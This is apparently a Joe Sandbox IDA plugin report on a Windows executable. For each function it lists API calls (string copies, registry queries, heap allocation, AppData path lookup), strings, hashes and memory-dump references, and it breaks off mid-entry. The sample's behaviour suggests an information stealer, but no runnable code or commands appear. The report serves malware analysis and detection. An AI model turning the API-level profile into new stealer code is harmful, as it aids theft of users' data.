                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB
                                • API String ID: 2922868504-2651807785
                                • Opcode ID: 18291ed33f86cb9d620553ee6acc922bc147fdf30718d037a68297d598a0bf20
                                • Instruction ID: 1b6e60ad14defaafc7565d383fed7930e20313ce6d83fdde1becf409cc6816fd
                                • Opcode Fuzzy Hash: 18291ed33f86cb9d620553ee6acc922bc147fdf30718d037a68297d598a0bf20
                                • Instruction Fuzzy Hash: CE01DD71A44218BFDB24DF98EC49BBEB7B8FB45720F404129F905DB344DB7859008795
                                APIs
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlenmemset
                                • String ID:
                                • API String ID: 3212139465-0
                                • Opcode ID: 83d61c032b09d91f140ece331ba3f8c3fa86c92d6b9a53eb76bd332633bd9792
                                • Instruction ID: 08bcd4042ad0d40c617e2d582a99722ba178d362b5ff402b5cd4d418255b4175
                                • Opcode Fuzzy Hash: 83d61c032b09d91f140ece331ba3f8c3fa86c92d6b9a53eb76bd332633bd9792
                                • Instruction Fuzzy Hash: 42810970D002059BEB14CF98DC84BAEBBB5FF84304F2480ADE649A7385EB799945CB94
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 01007F31
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01007F60
                                • StrCmpCA.SHLWAPI(00000000,01024C3C), ref: 01007FA5
                                • StrCmpCA.SHLWAPI(00000000,01024C3C), ref: 01007FD3
                                • StrCmpCA.SHLWAPI(00000000,01024C3C), ref: 01008007
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: a803473a8af664daaae8dd71c44de4f016fb978d9a88962914d22d6b620bd6d9
                                • Instruction ID: a850ef3a3cd93341884756bab6db116e771e09369b850817964e416b43722dbc
                                • Opcode Fuzzy Hash: a803473a8af664daaae8dd71c44de4f016fb978d9a88962914d22d6b620bd6d9
                                • Instruction Fuzzy Hash: 5341893050011ADFEB22DF68D484AAEBBF4FF44340F11409DE986DB295DB78AA61CB91
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 010080BB
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010080EA
                                • StrCmpCA.SHLWAPI(00000000,01024C3C), ref: 01008102
                                • lstrlen.KERNEL32(00000000), ref: 01008140
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100816F
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 85ed84d4bd2f6cc1a3d318ecba795ccf4665bce64447f3f7b29e470834b66a46
                                • Instruction ID: 9653c3e102f4dd542c5b3841cdc8237d520f160503176bde1807b1ebd858f181
                                • Opcode Fuzzy Hash: 85ed84d4bd2f6cc1a3d318ecba795ccf4665bce64447f3f7b29e470834b66a46
                                • Instruction Fuzzy Hash: A4417171900106ABEB62DF6CD948BAEBBF8FF44700F10855EEA85D7295EB34D941CB90
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 01013166
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0101316D
                                • RegOpenKeyExA.ADVAPI32(80000002,00D5B938,00000000,00020119,?), ref: 0101318C
                                • RegQueryValueExA.ADVAPI32(?,00D6DC70,00000000,00000000,00000000,000000FF), ref: 010131A7
                                • RegCloseKey.ADVAPI32(?), ref: 010131B1
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 67f483bc038ddf6b3236999a984a460a851fa9c45876c7e50615966d7201d22b
                                • Instruction ID: 0bfe1801d91b170010882b07c630fef0bea8fb0fb67cec7b24474241fdbcf1bf
                                • Opcode Fuzzy Hash: 67f483bc038ddf6b3236999a984a460a851fa9c45876c7e50615966d7201d22b
                                • Instruction Fuzzy Hash: CE118272A00218BFD720CF98E849FAFBBBCF744720F004119FA05D3644D774590087A0
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00FF8996
                                  • Part of subcall function 0101A1C0: std::exception::exception.LIBCMT ref: 0101A1D5
                                  • Part of subcall function 0101A1C0: std::exception::exception.LIBCMT ref: 0101A1FB
                                • std::_Xinvalid_argument.LIBCPMT ref: 00FF89CD
                                  • Part of subcall function 0101A173: std::exception::exception.LIBCMT ref: 0101A188
                                  • Part of subcall function 0101A173: std::exception::exception.LIBCMT ref: 0101A1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: invalid string position$string too long
                                • API String ID: 2002836212-4289949731
                                • Opcode ID: b95d987eeb42e18a8d50b754d7e661309250aabc8b8dfbe8454969ad8b195d47
                                • Instruction ID: 2989033fd14bfd5bc5ed24f11214a6753467618d990c20997091d32682565ec2
                                • Opcode Fuzzy Hash: b95d987eeb42e18a8d50b754d7e661309250aabc8b8dfbe8454969ad8b195d47
                                • Instruction Fuzzy Hash: B921D8323006549BCB319A5CE840A7AF795DFA17E1B11093FE281CB260CBB5DC42D3A5
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00FF8883
                                  • Part of subcall function 0101A173: std::exception::exception.LIBCMT ref: 0101A188
                                  • Part of subcall function 0101A173: std::exception::exception.LIBCMT ref: 0101A1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long$yxxx$yxxx
                                • API String ID: 2002836212-1517697755
                                • Opcode ID: fea21b87694ab7897c7f88e3ff5b08613f7fcd2e8ed5d728d9070e793073916a
                                • Instruction ID: 737f1392eca85006a743c323d4b9df2d84aeb6bc7d91a06bef868e17c582c6be
                                • Opcode Fuzzy Hash: fea21b87694ab7897c7f88e3ff5b08613f7fcd2e8ed5d728d9070e793073916a
                                • Instruction Fuzzy Hash: 7A31A9B5E005199FCB08DF58C8916ADBBB6EF88350F148269EA15EF354DB34AD01CBD1
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 01015922
                                  • Part of subcall function 0101A173: std::exception::exception.LIBCMT ref: 0101A188
                                  • Part of subcall function 0101A173: std::exception::exception.LIBCMT ref: 0101A1AE
                                • std::_Xinvalid_argument.LIBCPMT ref: 01015935
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_std::exception::exception
                                • String ID: Sec-WebSocket-Version: 13$string too long
                                • API String ID: 1928653953-3304177573
                                • Opcode ID: 83dabfcd0b57a7cee5da9d5449f6cb7a2c8eca2a6914a5fca78ba25b8fa1f5d9
                                • Instruction ID: 7abbb06643c51b99a4033dc815d5959b6135b35ddfb56e53e8fe52f2cb2f6850
                                • Opcode Fuzzy Hash: 83dabfcd0b57a7cee5da9d5449f6cb7a2c8eca2a6914a5fca78ba25b8fa1f5d9
                                • Instruction Fuzzy Hash: 861182303147508BC7328B2CEC0075A7BE2ABD7670F150A9EE1D1CF699D769D841C7A2
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,0101A430,000000FF), ref: 01013D20
                                • RtlAllocateHeap.NTDLL(00000000), ref: 01013D27
                                • wsprintfA.USER32 ref: 01013D37
                                  • Part of subcall function 010171E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 010171FE
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: f892063df0b92b0a02b9d35485f3cb9c4c384b1a4d39b1c0d416f7c6123ceca8
                                • Instruction ID: 52152dad0dcc86fe4c15a06ca83ac21a7470b23b5980922245338bb584e7d717
                                • Opcode Fuzzy Hash: f892063df0b92b0a02b9d35485f3cb9c4c384b1a4d39b1c0d416f7c6123ceca8
                                • Instruction Fuzzy Hash: 20018071640328BBEB305F55EC4EF6EBBB8FB45B65F000115FA059B284DBB85A00C7A5
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00FF8737
                                  • Part of subcall function 0101A173: std::exception::exception.LIBCMT ref: 0101A188
                                  • Part of subcall function 0101A173: std::exception::exception.LIBCMT ref: 0101A1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long$yxxx$yxxx
                                • API String ID: 2002836212-1517697755
                                • Opcode ID: e5ae741e6b2743760c0e89d4c2623cf10359e052185580fff2374a3ac0f95148
                                • Instruction ID: 60f5f89196fd984e9c9cffafa00c2f62be848b3d66adadb9825d1e3f57a03a02
                                • Opcode Fuzzy Hash: e5ae741e6b2743760c0e89d4c2623cf10359e052185580fff2374a3ac0f95148
                                • Instruction Fuzzy Hash: 81F09027F000260F8314743D8D855AEA9465AE52E033AD725EA5AEF269DC71EC83A5D4
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0100E544
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100E573
                                • lstrcat.KERNEL32(?,00000000), ref: 0100E581
                                • lstrcat.KERNEL32(?,00D6D9B0), ref: 0100E59C
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
